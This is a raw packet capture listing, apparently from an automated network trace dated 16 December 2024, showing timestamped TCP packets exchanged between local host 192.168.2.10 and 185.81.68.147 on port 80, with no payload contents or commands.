                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.594232082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.594312906 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.594350100 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.594400883 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.594443083 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.595261097 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.595273018 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.595319986 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.596141100 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.596153021 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.596194983 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.596945047 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.597069025 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.597114086 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.597775936 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.597898960 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.597934008 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.598767996 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.598778963 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.598844051 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.599534035 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.599688053 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.599775076 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.600477934 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.600610018 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.600688934 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.601351976 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.601416111 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.601497889 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.602250099 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.602751017 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.602842093 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.603157997 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.603169918 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.603252888 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.604038954 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.604052067 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.604145050 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.605127096 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.605139971 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.605232000 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.605778933 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.605792046 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.605900049 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.606559038 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.606878042 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.607012987 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.607539892 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.607551098 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.607645035 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.608438015 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.608450890 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.608547926 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.609297991 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.618165016 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.618181944 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.618279934 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.618459940 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.618511915 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.619280100 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.619354010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.619395971 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.619457006 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.620265961 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.620322943 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.620359898 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.621221066 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.621285915 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.621470928 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.622035980 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.622090101 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.622534037 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.622859955 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.622915030 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.622993946 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.663183928 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.761598110 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.761615038 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.761744022 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.761902094 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.762068987 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.762216091 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.763108969 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.763122082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.763202906 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.763998985 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.764009953 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.764084101 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.764230013 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.764971972 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.764983892 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.765019894 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.765803099 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.765815020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.765856981 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.766736031 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.766746998 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.766786098 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.767647028 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.767658949 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.767693043 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.768480062 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.768491030 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.768522024 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.769366026 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.769376993 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.769407988 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.770246029 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.770257950 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.770293951 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.771117926 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.771130085 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.771164894 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.771994114 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.772015095 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.772052050 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.772763014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.772818089 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.772926092 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.773767948 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.773780107 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.773814917 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.774660110 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.774671078 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.774748087 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.775455952 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.775501966 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.775546074 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.776352882 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.776396036 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.776519060 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.777189970 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.777237892 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.777409077 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.778151989 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.778162956 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.778243065 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.778933048 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.778987885 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.779076099 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.779932022 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.779942989 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.779975891 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.780786037 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.780797958 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.780822039 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.781678915 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.781689882 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.781718969 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.782520056 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.782531023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.782574892 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.783363104 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.783416986 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.784184933 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.784198046 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.784279108 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.784806967 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.785159111 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.785171986 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.785202980 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.786020041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.786032915 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.786079884 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.786995888 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.787009001 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.787053108 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.787859917 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.787873030 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.787916899 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.788683891 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.788695097 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.788741112 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.789602995 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.789613962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.789644003 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.790527105 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.790539980 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.790565968 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.791270018 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.791281939 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.791323900 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.792201042 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.792212009 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.792246103 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.793044090 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.793055058 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.793086052 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.793986082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.793997049 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.794034958 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.794802904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.794815063 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.794848919 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.795718908 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.795731068 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.795767069 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.796530962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.796542883 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.796575069 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.797518015 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.797530890 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.797578096 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.798329115 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.798341036 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.798386097 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.799196005 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.799210072 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.799257994 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.799983978 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.800045013 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.800822020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.801028013 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.801038980 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.801182985 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.804831982 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.804925919 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.810395956 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.810408115 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.810509920 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.810792923 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.811625957 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.811638117 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.811700106 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.812807083 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.812885046 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.816493988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.816504955 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.816515923 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.816566944 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.816587925 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.816601038 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.816608906 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.816616058 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.816641092 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.816744089 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.816776991 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.954004049 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.954024076 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.954159975 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.954257965 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.954371929 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.954742908 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.955327034 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.955343008 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.955461025 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.956063032 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.956075907 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.956178904 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.956876040 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.956949949 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.957034111 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.957819939 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.957834005 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.957951069 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.958591938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.959021091 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.959122896 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.959460020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.959661961 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.959907055 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.960474968 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.960541964 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.960629940 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.961261034 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.961451054 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.961587906 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.962081909 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.962593079 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.962682962 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.963004112 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.963356972 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.963449001 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.963989019 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.964000940 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.964099884 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.964864016 CET8049723185.81.68.147192.168.2.10
